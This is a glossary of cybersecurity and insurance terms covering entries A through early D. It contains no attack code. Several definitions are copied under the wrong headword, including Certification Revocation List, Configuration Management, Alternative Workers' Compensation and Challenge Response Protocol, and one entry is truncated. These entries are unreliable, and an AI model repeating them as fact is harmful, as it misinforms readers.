A
Acceptable Use Policy
Acceptable Use Policy defines the level of access and degree of use of the organization’s network or internet by its members.
Access Control List
Access Control List or ACL filter network traffic by controlling whether it's allowed or blocked.
Access Path
An Access Path is a logical order that directs to the location on the computer where an object such as webpage, file etc., is stored.
Access Point
An access point is a computer networking device which allows a Wi-Fi compliant device to connect to a wired network and usually connects via a router.
Access Profile
An access profile is information about a user stored on a computer, including their password, name, and what they are allowed access to.
Access Rights
Access rights are the privileges or permissions awarded to a user or a program to access or alter, edit, delete the files stored on a network.
Access Type
Access type is applied to an entity class, mapped superclass or embeddable class, and is used to specify attributes.
Account Hijacking
a type of identity theft, when a hacker hacks and steals someone’s account to perform malicious actions.
Accountability
Accountability is the ability to trace an action performed on the system to a user, a process, or an application.
Accounting Legend Code
Accounting legend code is numeric code used to indicate the minimum accounting controls required for items accountable communications security (COMSEC) material within the control systems.
Accumulation Period
Insured must incur eligible medical expenses at least equal to the deductible amount to establish a benefit period under a major medical expense or comprehensive medical expense policy.
ACL
Access Control List or ACL filter network traffic by controlling whether it's allowed or blocked.
Active Security Testing
Active security testing is security testing which involves directly interacting with a target, such as sending packets.
Actual Cash Value
repayment value for indemnification due to loss or damage of property; in most cases it is replacement cost minus depreciation.
Actuarial Report
(PC Insurance) a document or other presentation, prepared as a formal means of conveying to the state regulatory authority and the Board of Directors, or its equivalent, the actuary's professional conclusions and recommendations, of recording and communicating the methods and procedures, of assuring that the parties addressed are aware of the significance of the actuary's opinion or findings and that documents the analysis underlying the opinion. (In Life and Health) this document would be called an "Actuarial Memorandum."
Actuary
business professional who analyzes probabilities of risk and risk management including calculation of premiums, dividends, and other applicable insurance industry standards.
Ad Hoc Network
An ad hoc network is a local area network (LAN) that spontaneously builds as devices connect. An ad hoc network does not rely on a base station to coordinate different points, rather the individual base nodes forward packets to and from each other.
Address Resolution Protocol
Address Resolution Protocol (ARP) is used for discovering a physical machine (MAC) address and associating it to the Internet Protocol (IP) address.
Adjuster
a person who investigates claims and recommends settlement options based on estimates of damage and insurance policies held.
Administrative Safeguards
Administrative safeguards are a special set of the HIPPA security rules. Administrative safeguards focus on internal organization, policies and procedures and the maintenance of security managers in place to protect sensitive patient information.
Admitted Assets
insurer assets which can be valued and included on the balance sheet to determine the financial viability of the company.
Admitted Company
An insurance company licensed to do business in a state(s), domiciled in an alternative state or country.
Advanced Encryption Standard
The Advanced Encryption Standard, or AES, is a symmetric block cipher chosen by the U.S. government to protect classified information and is implemented in software and hardware throughout the world to encrypt sensitive data.
Advanced Penetration Testing
Advanced penetration testing is the process of testing a network to discover vulnerabilities which make it open to harmful intruders; then addressing and remedying the issues.
Advanced Persistent Threat
An advanced persistent threat (APT) is a network attack in which an unauthorized person gains access to a network and stays there undetected for a long time.
Advanced Premiums
occur when a policy has been processed, and the premium has been paid prior to the effective date. These are a liability to the company and not included in the written premium or the unearned premium reserve.
Adversary
An Adversary is a process, user or device that possesses a threat to the network.
Adverse Selection
the social phenomenon whereby persons with a higher-than-average probability of loss seek greater insurance coverage than those with less risk.
Advisory Organization
a group supported by member companies whose function is to gather loss statistics and publish trended loss costs.
Adware
Adware is a type of malware. It downloads to your device and displays advertisements based on your online activity or browsing history. Adware can appear as intrusive interstitials (pop-ups) and may slow down your device.
AES
The Advanced Encryption Standard, or AES, is a symmetric block cipher chosen by the U.S. government to protect classified information and is implemented in software and hardware throughout the world to encrypt sensitive data.
Affiliate
a person or entity that directly, or indirectly, through one or more other persons or entities, controls, is controlled by or is under common control with the insurer.
Agent
an individual who sells, services, or negotiates insurance policies either on behalf of a company or independently.
Aggregrate
the maximum dollar amount or total amount of coverage payable for a single loss, or multiple losses, during a policy period, or on a single project.
Aggregrate Cost Payments
method of reimbursement of a health plan with a corporate entity that directly provides care, where (1) the health plan is contractually required to pay the total operating costs of the corporate entity, less any income to the entity from other users of services, and (2) there are mutual unlimited guarantees of solvency between the entity and the health plan that put their respective capital and surplus at risk in guaranteeing each other.
Air Gap
Air Gap is a network security measure to ensure that a secure computer network is physically isolated from unsecured networks.
ALAE
an estimate of the claims settlement associated with a particular claim or claims.
Alert Situation
An alert situation is when the interruption in an enterprise is not resolved even after the competition of the threshold stage, an alert situation requires the enterprise to start escalation procedure.
Alien Company
an insurance company formed according to the laws of a foreign country. The company must conform to state regulatory standards to legally sell insurance products in that state.
All-Risk
also known as open peril, this type of policy covers a broad range of losses. The policy covers risks not explicitly excluded in the policy contract.
Allied Lines
coverages which are generally written with property insurance, e.g., glass, tornado, windstorm, and hail; sprinkler and water damage; explosion, riot, and civil commotion; growing crops; flood; rain; and damage from aircraft and vehicle, etc.
Alternate Facilities
Alternate facilities are secondary facilities includes Offices, data processing centers etc., from where high- priority emergency tasks can be performed, delivered when primary facilities are interrupted, unavailable.
Alternate Process
An alternate process is a back-up process devised to help continue business critical processes without any interruption, from the time the primary enterprise system breaks down to the time of its restoration.
Alternative Workers’ Compensation
also known as open peril, this type of policy covers a broad range of losses. The policy covers risks not explicitly excluded in the policy contract.
Ambulatory Services
health services provided to members who are not confined to a health care institution. Ambulatory services are often referred to as "outpatient" services.
Analog
Analog is a transmission signal denoted by ‘Sine Way,’ that varies in signal strength (Amplitude) or Frequency (time). While the wave's higher and lower points denote the value of signal strength, the physical length indicates the value of time.
Annual Statement
An annual report must be filed with each state where an insurer does business. This report provides a snapshot of the financial condition of a company and significant events which occurred throughout the reporting year.
Annuitant
the beneficiary of an annuity payment, or person during whose life and annuity is payable.
Annuities- Immediate Non-Variable
an annuity contract that provides for the fixed payment of the annuity at the end of the first interval of payment after purchase. The interval may vary; however, the annuity payouts must begin within 13 months.
Annuity
a contract providing income for a specified period of time, or duration of life for a person or persons.
Anonymizing Proxy
Anonymizing proxies allow the user to hide their web browsing activity. They are often used to bypass web security filters—e.g., to access blocked sites from a work computer.
Anti-Spam
Anti-spam programs can detect unwanted email and prevent it from reaching user inboxes.
Anti-Virus Software
Antivirus software is a program or a set of programs that help prevent any malicious object, code, program from entering your computer or network. If any such malicious programs enter your computer, Antivirus software helps detect, quarantine, or remove such programs from the computer or networks.
APT
An advanced persistent threat (APT) is a network attack in which an unauthorized person gains access to a network and stays there undetected for a long time.
ARP
Address Resolution Protocol (ARP) is used for discovering a physical machine (MAC) address and associating it to the Internet Protocol (IP) address.
Anti-Spyware
Anti-spyware is a type of software designed to detect and remove unwanted spyware programs.
Antivirus
Antivirus is software that is designed to prevent, search for, detect, and remove software viruses, and other malicious software like worms, trojans, adware, and more.
App Attack
An app attack occurs when a user unknowingly installs a harmful app on their tablet or smartphone and the app in turn steals their personal data.
Appliances
Appliances are a combination of hardware and software security elements in one solution. This lets you plug appliances in rather than installing the software separately.
Application Control
Application control allows you to control the use of applications that may be inappropriate for use on business computers or networks.
Application Layer
An Application Layer is one of the seven layers in the Open-System Interconnection (OSI) Model of the TCP/IP protocol Suite. Application Layer defines the way process-to-process communication happens in a network; it only offers a strong communication interface and end user services.
Appraisal
an estimate of value
Arbitration
a binding dispute resolution tactic whereby a conciliator with no interest in the outcome intercedes.
Architecture
Architecture is a structure that defines or describes the very fundamentals of a system or an organization, its components, the relationship between each of these components, their relationship to the overall system, and finally, their effectiveness in guiding the system towards its goals.
Assessed Value
Estimated value for real or personal property established by a taxing entity.
Asset
probable future economic benefits obtained or controlled by a particular entity because of past transactions or events. An asset has three essential characteristics: It embodies a probable future benefit that involves a capacity, singly or in combination with other assets, to contribute directly or indirectly to future net cash inflows; A particular entity can obtain the benefit and control others' access to it; and the transaction or other event-giving rise to the entity's right to or control of the benefit has already occurred.
Asset Risk
in the risk-based capital formula, risk assigned to the company's assets.
Assigned Risk
A governmental pool established to write business declined by carriers in the standard insurance market.
Assisted Living Care
a policy or rider that provides coverage only while a policyholder is confined to an assisted living facility and meets the policy requirements for coverage.
Assumed Reinsurance
the assumption of risk from another insurance entity within a reinsurance agreement or treaty.
Asymmetric Key (Public Key)
An Asymmetric Key (public key) is a security measure that uses two keys to ensure the confidentiality of a message. One key encrypts the message, while the other key decrypts it.
Attack
An attack is an action with malicious intention to interrupt the operations of a network or steal the data, etc.
Attack Mechanism
An Attack Mechanism is a system or strategy by which a target is hit; the attacker may use different attack mechanisms such as a container or payload to hit the intended target.
Attack Vector
An Attack Vector is a means and way by which an attacker gains entry into the target system. Attackers mainly use the human element or the weak links to gain such access.
Attenuation
Attenuation is the weakening of signal strength, analog or digital, especially when transmitted over long distances.
Audit Trail
An audit trail is a detailed history of transactions to help you trace a piece of information back to its origin. In the field of computers, Audit trail or paper log helps maintain security, recover any lost data.
Authentication
Authentication is the process of identifying a piece of information, the veracity of information provided. In computers, it is the process of identifying a person or system with the username, password, etc. Authentication helps individuals; systems gain authorization based on their identity.
Authenticity
Authenticity is the proof or validity that a claimed identity (whether human or a resource) is real and legitimate.
Authorized Company
an insurer licensed or admitted doing business in a particular state.
Authorized Control Level Risk Based Capital
theoretical amount of capital plus surplus an insurance company should maintain.
Authorized Reinsurance
reinsurance is placed with a reinsurer licensed or otherwise allowed to conduct reinsurance within a state.
Autorun Worm
Autorun worms are malicious programs that take advantage of the Windows Autorun feature. They execute automatically when the device on which they are stored is plugged into a computer.
Availability
Availability is the time duration a system or resource is ready for use.
B
Backdoor
A backdoor is a method, often secret, of bypassing normal authentication or encryption in a computer system.
Backdoor Trojan
A backdoor Trojan allows someone to take control of a user’s computer without their permission.
Backup
A backup refers to the archiving data so it may be used to restore the original after a data loss event.
Balance Sheet
accounting statement showing the financial condition of a company at a particular date.
Bandwidth
Bandwidth is the capacity of a communication channel to pass data through in a given amount of time.
Banner
A banner is a display on an information system that sets the parameters for system or data use.
Banner Grabbing
Banner grabbing is the process of grabbing banner information such as the application type and version. This information is then transmitted by a remote port when a connection is initiated.
Baseline
A security baseline defines a set of basic security objectives which must be met by any given service or system.
Baseline Security
Baseline security is the minimum set of security controls required for safeguarding an IT system. Baseline security is based upon a system’s identified needs for confidentiality, integrity, and availability protection.
Bastion
A Bastion is a system of high level of security protection; such a system offers very strong protection against attacks.
Bastion Host
A bastion host is a special services computer on a network that is designed to withstand attacks.
Behavioral Outcome
A Behavioral outcome is what an individual who has completed a specific training module is expected to accomplish on regular IT security job performance.
Beneficiary
an individual who may become eligible to receive payment due to will, life insurance policy, retirement plan, annuity, trust, or another contract.
Biometrics
Biometrics is a security system, which considers the unique physiological characteristics of a person such as fingerprints, DNA, hair, etc., for identification purposes.
Bit Error Rate
A bit error rate is the ratio between the number of bits incorrectly received and the total number of bits transmitted in a telecommunication system.
Black Core
A black core is a communication network architecture in which user data traversing a global internet protocol (IP) is end-to-end encrypted at the IP layer.
Blacklist
A blacklist is a basic access control mechanism that allows through all elements except those explicitly mentioned.
Blanket Coverage
coverage for property and liability that extends to more than one location, class of property or employee.
Blended Attack
A blended attack is a hostile action with the intent of spreading malicious code.
Block Cipher
A Block Cipher is a method used to cipher text and information by encrypting data in blocks, strings, or groups at a time encrypting individual bits.
Block Cipher Algorithm
A Block cipher algorithm is a family of functions and their inverses parameterized by a cryptographic key in which the function map bit strings of a fixed length to bit strings of the same length.
Bonds
a form of debt security whereby the debt holder has a creditor stake in the company. Obligations issued by business units, governmental units and certain nonprofit units having a fixed schedule for one or more future payments of money; includes commercial paper, negotiable certificates of deposit, repurchase agreements and equipment trust certificates.
BCP
A Disaster Recovery Plan (DRP) or a Business Continuity Plan (BCP) prescribes steps required to carry on the business as usual in a disaster. Disaster recovery plan aims to bring business activities back to normalcy in the shortest possible time; such efforts require an in
Book Value
original cost, including capitalized acquisition costs and accumulated depreciation, unamortized premium and discount, deferred origination and commitment fees, direct write-downs, and increase/decrease by adjustment.
Boot Sector Malware
Boot sector malware spreads by modifying the program that enables your computer to start up.
Bot
A bot is a type of software or a script that performs automated tasks on the command.
Botnet
A botnet is a network of private computers infected with malicious software. A botnet may be controlled without the owner's knowledge or used to send spam messages.
Boundary
A boundary is a fence or an imaginary line, which indicates the limit of an organization, and its relationship with its neighbors.
Bridge
A bridge is an electronic device that connects two networks such as LAN that uses the same protocol such as Ethernet or Token Ring and creates two distinct LAN’s or Wide Area Networks. Operating at the Data Link Layer of the Open System Interconnect model, bridges can filter the information and pass such information to the right nodes or decide not to pass any information. They also help in streamlining or reducing the volume of traffic on a LAN by dividing the data into two segments.
Bring Your Own Device
A policy where employees can connect their devices to corporate applications and networks.
Broadcast
A Broadcast is a process of transmitting the same message to multiple users simultaneously.
Broker
an individual who receives commissions from the sale and service of insurance policies. These individuals work on behalf of the customer and are not restricted to selling policies for a specific company, but commissions are paid by the company with which the sale was made.
Browser Hijacker
Browser hijackers change the default homepage and search engine in your Internet browser without your permission.
Brute Force
Brute Force is a computing method that relies on strong algorithms and computing techniques to find the ultimate solution to a given issue.
Brute Force Attack
A Brute Force Attack is the process of finding the solution by constantly trying many probable variants of information such as passwords, deciphered keys, etc., in a random fashion.
Bug
A bug is an unintended software or hardware problem. These can be minor problems or error screens that don’t necessarily compromise a system. However, it can also be more significant and render a system inoperable.
Buffer Overflow
A buffer overflow occurs when a program or process attempts to write more data to a fixed length block of memory.
Burglary and Theft
coverage for property taken or destroyed by breaking and entering the insured's premises, burglary or theft, forgery or counterfeiting, fraud, kidnap and ransom, and off-premises exposure.
Business Continuity Plan
A Disaster Recovery Plan (DRP) or a Business Continuity Plan (BCP) prescribes steps required to carry on the business as usual in a disaster. Disaster recovery plan aims to bring business activities back to normalcy in the shortest possible time; such efforts require an in
Business Impact Analysis/Assessment
A Business Impact Analysis/Assessment is the process of evaluating and identifying risks and threats that a business might face in the event of an accident, disaster, or an emergency. It evaluates the possible risk to tangible and intangible assets such as personal, infrastructure, data, and goodwill. In addition, it offers steps needed to recover from any such disasters.
Business Interruption
Loss of income from property damage to a business facility.
Business Owners Policy
business insurance typically for property, liability, and business interruption coverage.
BYOD
A policy where employees can connect their devices to corporate applications and networks.
C
Cache
A place to temporarily store something in a computing environment. Active data is often cached to shorten data access times, reduce latency, and improve input/output (improve application performance).
Calendar Year Deductible
in health insurance, the amount that must be paid by the insured during a calendar year before the insurer becomes responsible for further loss costs.
Capital and Surplus
a company's assets minus its liabilities.
Capital and Surplus Retirement
statutory requirement ordering companies to maintain their capital and surplus at an amount equal to or in excess of a specified amount to help assure the solvency of the company by providing a financial cushion against expected loss or misjudgments and generally measured as a company's admitted assets minus its liabilities, determined on a statutory accounting basis.
Capital Gains (Loss)
excess (deficiency) of the sales price of an asset over its book value. Calculated based on original cost adjusted, as appropriate, for accrual of discount or amortization of premium and for depreciation.
Capitation Arrangement
A compensation plan used in connection with some managed care contracts where a physician or other medical provider is paid a flat amount, usually monthly, for each subscriber who has chosen to use that physician or medical provider. Capitated payments are sometimes expressed in terms of a "per member/per month" payment. The capitated provider is generally responsible, under the conditions of the contract, for delivering or arranging for the delivery of all contracted health services required by the covered person.
Captive Agent
an individual who sells or services insurance contracts for a specific insurer or fleet of insurers
Captive Insurer
An insurance company established by a parent firm to ensure the parent's exposures.
Carrying Value (Amount)
the SAP book value plus accrued interest and reduced by any valuation allowance and any non-admitted adjustment applied to the individual investment.
Cash
a medium of exchange
Cash Equivalent
short-term, highly liquid investments that are both (a) readily convertible to known amounts of cash, and (b) so near their maturity that they present insignificant risk of changes in value because of changes in interest rates. Investments with original maturities of three months or less qualify under this definition.
Casualty Insurance
a form of liability insurance providing coverage for negligent acts and omissions such as workers compensation, errors and omissions, fidelity, crime, glass, boiler, and various malpractice coverages
Catfishing
when someone uses a social network to create an account with a fake identity to deceit a concrete person.
Catastrophe Bonds
Bonds issued by an insurance company with funding tied to the company's losses from disasters or acts of God. A loss exceeding a certain size triggers a reduction in the bond value or a change in the bond structure as loss payments are paid out of bond funds.
Catastrophe Loss
a large magnitude loss with little ability to forecast.
Category
A category is restrictive label applied to classified or unclassified information to limit access.
Ceded Premium
amount of premium (fees) used to purchase reinsurance.
Ceding Company
an insurance company that transfers risk by purchasing reinsurance.
Central Service Node
A Central Services Node is the Key Management Infrastructure core node that provides central security management and data management services.
Certificate Authority
A Certificate Authority (CA) is an independent third party that verifies the online identity of an entity. They issue digital certificates that contain information about the owner of the certificate and details of the certificates, thus verifying the identity of the owner.
Certificate Management
Certificate Management is the process in which certificates are generated, used, transmitted, loaded, and destroyed.
Certification Revocation List
A Certificate Revocation List is an independent third party that verifies the online identity of an entity. They issue digital certificates that contain information about the owner of the certificate and details of the certificates, thus verifying the identity of the owner.
Chain of Custody
A Chain of Custody is a process that defines rules for evidence to be legally accepted. A neutral third party, who has no interest in the case, collects the evidence after properly identifying it; and that the evidence is accountable until it is presented in the court of law. The collector makes the evidence tamper-proof and seals it tightly. It contains complete information about the evidence as to how he had collected it, and who had access to it.
Chain of Evidence
The chain of evidence shows who obtained the evidence, where the evidence came from, also who secured, had control and possession of the evidence. The chain of evidence goes in the following order: collection and identification; analysis; storage; preservation; presentation in court; return to owner.
Challenge Response Protocol
A Numerical value that helps to check if the data transmitted is the same as the data stored and that the recipient has error free data. It is often the sum of the numerical values of bits of digital data stored, this value should match with the value at the recipient’s end, and a mismatch in the value indicates an error.
Change in Valuation Basis
a change in the interest rate, mortality assumption or reserving method or other factors affecting the reserve computation of policies in force.
Chartered Life Underwriter (CLU)
a professional designation awarded by the American College to persons in the life insurance field who pass a series of exams in insurance, investment, taxation, employee benefit plans, estate planning, accounting, management, and economics.
Checksum
A checksum is a simple type of redundancy check that is used to detect errors in data.
Chief Information Security Officer
A Chief Information Security Officer is a senior level executive of an organization entrusted with the responsibilities of protecting the information assets of the businesses and making sure that the information policies of the organization align with the objectives of the organization.
Chief Security Officer
The Chief Security Officer is an executive of the company with assigned responsibility to protect assets such as the infrastructure, personnel, including information in digital and physical form.
Cipher
A Cipher is a process to convert data into code, or encrypt, with the help of an algorithm; to decipher the code a key is required.
Cipher Text
Cipher Text is data converted from plain text into code using algorithm, making it unreadable without the key.
Ciphony
Ciphony is the process of enciphering audio information from encrypted speech.
C&C
A command-and-control center (C&C) is a computer that controls a network of compromised computers.
CAPEC
A Common Attack Pattern Enumeration and Classification is a document published by MITRE Corporation that details how vulnerable systems are attacked. The community-developed document describes common attack patterns and how such attacks are executed.
CERT
A Computer Emergency Response Team (CERT) is a team formed to study the vulnerabilities of information systems of an organization and offer solutions and strategies to face such vulnerabilities. Such teams are highly organized with clearly defined clear roles and responsibilities.
Claim
a request made by the insured for insurer remittance of payment due to loss incurred and covered under the policy agreement.
Claimant
A claimant is the party who needs to be identified via an authentication protocol.
Claims Adjustment Expenses
costs expected to be incurred in connection with the adjustment and recording of accident and health, auto medical and workers' compensation claims.
Claims-Made Form
A type of liability insurance form that only pays if both the event that causes (triggers) the claim and the actual claim are submitted to the insurance company during the policy term.
Class Rating
a method of determining rates for all applicants within a given set of characteristics such as personal demographic and geographic location.
Cleartext
Cleartext is data in ASCII format or data that is not coded or encrypted. All applications and machines support plain text.
Click Fraud
Scammers generate money using fake clicks. They will sometimes hire people and pay them to click on ads from several devices to earn affiliate or advertising cash for an app install or website visit.
Clinger-Cohen Act of 1996
The Clinger-Cohen Act is also known as the Information Technology Management Reform Act. This statute made significant changes in the way that IT resources are managed and procured. The most significant aspect of this act is the requirement that each agency design and implement a process for maximizing the value and assessing and managing the risks of IT investments.
Closed Source
a proprietary technology whose copyright hides its source code and forbids its distribution or modification. Examples of closed source commercial software are Skype, Java, Opera.
Cloud Computing
Cloud computing is the on-demand delivery of computer power, database storage, applications, and other IT resources through a cloud services platform via the internet with pay-as-you-go pricing.
Cloud Security
Cloud security refers to a broad set of policies, technologies, and controls deployed to protect data, applications, and the associated infrastructure of cloud computing.
Coinsurance
A clause contained in most property insurance policies to encourage policy holders to carry a reasonable amount of insurance. If the insured fails to maintain the amount specified in the clause (Usually at least 80%), the insured shares a higher proportion of the loss. In medical insurance a percentage of each claim that the insured will bear.
Cold Site
A cold site is a backup site that can become operational quickly, usually in one or two days. A cold site might have all the standard office things such as furniture and telephones, however there is unlikely to be any computer equipment in a cold site. Basically, a cold site is a backup facility ready to receive computer equipment should it need to move to an alternate location.
Collar
an agreement to receive payments as the buyer of an Option, Cap or Floor and to make payments as the seller of a different Option, Cap or Floor.
Collateral Loans
unconditional obligations for the payment of money secured by the pledge of an investment.
Collateralized Bond Obligations (CBOs)
an investment-grade bond backed by a pool of low-grade debt securities, such as junk bonds, separated into tranches based on various levels of credit risk.
Collateralized Mortgage Obligations (CMOs)
a type of mortgage-backed security (MBS) with separate pools of pass-through security mortgages that contain varying classes of holders and maturities (tranches) with the advantage of predictable cash flow patterns.
Collision
A collision is a situation where two or more devices – networking devices or computers – try sending requests or transmitting data to the same device at the same time.
Combinations
a special form of package policy composed of personal automobile and homeowners’ insurance.
Combined Ratio
an indication of the profitability of an insurance company, calculated by adding the loss and expense ratios.
Command and Control Center
A command-and-control center (C&C) is a computer that controls a network of compromised computers.
Commencement Date
Date when the organization first became obligated for insurance risk via the issuance of policies and/or entering a reinsurance agreement. Same as "effective date" of coverage.
Commercial General Liability
flexible & broad commercial liability coverage with two major sub-lines: premises/operations sub-line and products/completed operations sub-line.
Commercial Multiple Peril
policy that packages two or more insurance coverages protecting an enterprise from various property and liability risk exposures. Frequently includes fire, allied lines, various other coverages (e.g., difference in conditions) and liability coverage. Such coverage would be included in other annual statement lines, if written individually. Include under this type of insurance multi-peril policies (other than farm owners, homeowners, and automobile policies) that include coverage for liability other than auto.
Commercial Package Policy
provides a broad package of property and liability coverages for commercial ventures other than those provided insurance through a business owners policy.
Commercial Property
property insurance coverage sold to commercial ventures.
Commission
a percentage of premium paid to agents by insurance companies for the sale of policies.
Common Access Card
A Common Access Card is a Standard identification/smart card issued by the Department of Defense. A Common Access Card has an embedded integrated chip storing public key infrastructure (PKI) certificates.
Common Attack Pattern Enumeration and Classification
A Common Attack Pattern Enumeration and Classification is a document published by MITRE Corporation that details how vulnerable systems are attacked. The community-developed document describes common attack patterns and how such attacks are executed.
Community Rating
a rating system where standard rating is established and usually adjusted within specific guidelines for each group based on anticipated utilization by the group's employees.
Company Code
a five-digit identifying number assigned by NAIC, assigned to all insurance companies filing financial data with NAIC.
Compartmentalization
Compartmentalization is a technique of protecting confidential information by revealing it only to a few people, to those who need to know the details to perform their job. Thus, by restricting access to information, data the risk to business objectives is limited.
Completed Operations Liability
policies covering the liability of contractors, plumbers, electricians, repair shops, and similar firms to persons who have incurred bodily injury or property damage from defective work or operations completed or abandoned by or for the insured, away from the insured's premises.
Compliance Documents
A Compliance Document is a document detailing the actions required to comply with or adhere to the set standards by regulatory bodies. Any violations of the said rules attract punitive actions from the regulatory bodies.
Comprehensive General Liability (CGL)
coverage of all business liabilities unless specifically excluded in the policy contract.
Computer Emergency Response Team
A Computer Emergency Response Team (CERT) is a team formed to study the vulnerabilities of information systems of an organization and offer solutions and strategies to face such vulnerabilities. Such teams are highly organized with clearly defined clear roles and responsibilities.
Computer Forensics
Computer Forensics is the process of analyzing and investing computer devices, on suspecting that such devices may have been used in a cybercrime, with the aim of gathering evidence for presentation in a court of law. Computer forensics offers many tools for investigation and analysis to find out such evidence.
Concurrent Causation
property loss incurred from two or more perils in which only one loss is covered but both are paid by the insurer due to simultaneous incident.
Conditions
requirements specified in the insurance contract that must be upheld by the insured to qualify for indemnification.
Configuration Management
Computer Forensics is the process of analyzing and investing computer devices, on suspecting that such devices may have been used in a cybercrime, with the aim of gathering evidence for presentation in a court of law. Computer forensics offers many tools for investigation and analysis to find out such evidence.
Consumerization
Consumerization refers to new trends or changes in enterprise technology as more and more consumers embrace such technology. Employees use devices for personal use and as they gain wide acceptance, even organizations start using such technologies.
Containment
Containment is steps taken to control any further risks up on identifying a threat.
Content Filtering
Content Filtering is a process by which access to certain content, information, data is restricted, limited, or completely blocked based on an organization’s rules. Any objectionable email, website, etc., is blocked using either software or hardware-based tools.
Contingency Reserves
required by some jurisdictions as a hedge against adverse experience from operations, particularly adverse claim experience.
Contract Reserves
reserves set up when, due to the gross premium structure, the future benefits exceed the future net premium. Contract reserves are in addition to claim and premium reserves.
Contractual Liability
liability coverage of an insured who has assumed the legal liability of another party by written or oral contract. Includes a contractual liability policy providing coverage for all obligations and liabilities incurred by a service contract provider under the terms of service contracts issued by the provider.
Control
Control is the policies, strategies, guidelines, etc. established in collaboration with various departments of an organization such as management, legal, technical to help mitigate risk.
Convertible Term Insurance Policy
an insurance policy that can be converted into permanent insurance without a medical assessment. The insurer must renew the policy regardless of the insured's health subject to policy conditions.
Cookie
An HTTP cookie (also called web cookie, Internet cookie, browser cookie, or simply cookie) is a small piece of data sent from a website and stored on the user's computer by the user's web browser while the user is browsing.
Coordination of Benefits (COB)
provision to eliminate over insurance and establish a prompt and orderly claims payment system when a person is covered by more than one group insurance and/or group service plan.
Copay
a cost sharing mechanism in group insurance plans where the insured pays a specified dollar amount of incurred medical expenses, and the insurer pays the remainder.
Corrective Order
commissioner's directive of action to be completed by an insurer.
Counter Measure
A Countermeasure is a defensive mechanism that helps mitigate risk, threat, to a network or computers, using a process, system, or a device.
Covered Lines
The total number of lives insured, including dependents, under individual policies and group certificates.
Cracker
a person, who attacks a specific computer system. Often to steal or corrupt sensitive information or data about a company or a product.
Credit
individual or group policies that provide benefits to a debtor for full or partial repayment of debt associated with a specific loan or other credit transaction upon disability or involuntary unemployment of debtor, except in connection with first mortgage loans.
Credit- Assumption Agreement
An insurance certificate issued on an existing insurance contract indicating another insurer has assumed all the risk under the contract from the ceding insurance company.
Credit- Credit Default
coverage purchased by manufacturers, merchants, educational institutions, or other providers of goods and services extending credit, for indemnification of losses or damages resulting from the nonpayment of debts owed to them for goods or services provided in the normal course of their business.
Credit Disability
makes monthly loan/credit transaction payments to the creditor upon the disablement of an insured debtor.
Credit Health Insurance
policy assigning creditor as beneficiary for insurance on a debtor thereby remitting balance of payment to creditor should the debtor become disabled.
Credit- Involuntary Unemployment
makes loan/credit transaction payments to the creditor when the debtor becomes involuntarily unemployed.
Credit Life Insurance
policy assigning creditor as beneficiary for insurance on a debtor thereby remitting balance of payment to creditor upon death of debtor.
Credit Personal Property Insurance
insurance written in connection with a credit transaction where the collateral is not a motor vehicle, mobile home or real estate and that covers perils to the goods purchased through a credit transaction or used as collateral for a credit transaction and that concerns a creditor's interest in the purchased goods or pledged collateral, either in whole or in part; or covers perils to goods purchased in connection with an open-end transaction.
Credit Placed Insurance
insurance that is purchased unilaterally by the creditor, who is the named insured, after the date of the credit transaction, providing coverage against loss, expense, or damage to property as a result of fire, theft, collision, or other risks of loss that would either impair a creditor's interest or adversely affect the value of collateral. "Creditor Placed Home" means "Creditor Placed Insurance" on homes, mobile homes, and other real estate. "Creditor Placed Auto" means insurance on automobiles, boats, or other vehicles.
Credit Risk
part of the risk-based capital formula that addresses the collectability of a company's receivables and the risk of losing a provider or intermediary that has received advance capitation payments.
Critical Infrastructure
Critical Infrastructure is the fundamental system of an organization that is important for its function.
Critically
Criticality is the level of importance assigned to an asset or information. The organization may not function effectively or efficiently without a highly critical asset or information.
Cross Site Scripting
A type of injection security attack where an attacker will inject a malicious script into the content of website.
Cryptography
Cryptography is the practice of securing information and communication through writing and solving codes. It ensures that information is only readable to the party intended to read it. A cryptographer is responsible for converting plain data into an encrypted format.
Crypto jacking
when a hacker unauthorizedly uses someone’s computing power to mine cryptocurrency.
Cryptosystem
A system or an algorithm to encrypt plain text to secret code or cipher text to protect the privacy of information stored. A key help convert plain text to cipher text and vice-versa.
Cyberattacks
Cyberattacks refer to attempts by hackers to cause harm, destroy, or access sensitive information in a computer system.
Cyber Security Architecture
Cyber Security Architecture is the information security layout that describes the overall structure, including its various components, and their relationships in an organization. It displays how strong the data security, controls and preventive mechanisms implemented in the organization.
Cybercop
A Cybercop is a law enforcement officer entrusted with the responsibilities of monitoring online activities to control criminal activities online or cybercrimes.
Cyberespionage
Cyberespionage is spying on the computer systems of an organization with the help of a virus to steal or destroy data, information, etc. Such spying is unauthorized and happens in a clandestine matter.
Cyberwarfare
Cyberwarfare is virtual warfare waged online over the internet to weaken or harm the financial systems of an organization by stealing private and personal information available online on websites, etc.
D
Dark Web
The encrypted part of the internet that is not indexed by search engines. It is a subset of the deep web (which can be accessed by anyone with the correct URL). Dark web pages need special software (ex. Tor) with the correct decryption key and access rights and knowledge to find content. Users of the dark web remain almost completely anonymous due to its P2P network connections which makes network activity very difficult to trace.
Data Aggregation
Data aggregation is any process in which information is gathered and expressed in a summary form, for purposes such as statistical analysis.
Data Asset
A data asset is any entity that is comprised of data; for example, a database is an example of a data asset. A system or application output file, database, document, or Web page are also considered data assets. Data assets can also be a service that may be provided to access data from an application.
Data Breach
A data breach is a security incident in which sensitive, protected, or confidential data is copied, transmitted, viewed, stolen, or used by an individual who is not unauthorized to do so.
Data Classification
Data Classification is a data management process that involves categorizing and organizing data into different classes based on their forms, types, importance, sensitivity, and usage in an organization.
Data Custodian
A Data Custodian is an executive of an organization entrusted with the responsibilities of data administration, as such protecting and safeguarding data is the primary responsibility of Data custodian.
Data Element
A data element is a basic unit of information that has a unique meaning and subcategories (data items) of distinct value. Gender, race, and geographic location are all examples of data elements.
Data Encryption Standard
A Data Encryption Standard is a form of algorithm to convert plain text to cipher text. Data Encryption Standard uses the same key to encrypt and decrypt the data, and hence it is a symmetric key algorithm.
Data Flow Control
Data flow control is another term for information flow control.
Data Integrity
Data integrity is the maintenance of, and the assurance of, the accuracy and consistency of, the data.
Data Leakage
Data leakage is the unauthorized exposure of information. It can result in data theft or data loss.
Data Loss
Data loss is the result of the accidental misplacement of data, rather than its deliberate theft.
Data Loss Prevention (DLP)
the complex of security measures, related to detecting and preventing data loss and cyberattacks. DLP is included in the organization’s policy. Individuals need to follow this strategy to keep all business and personal data safe from ransomware or malware attacks.
Data Owner
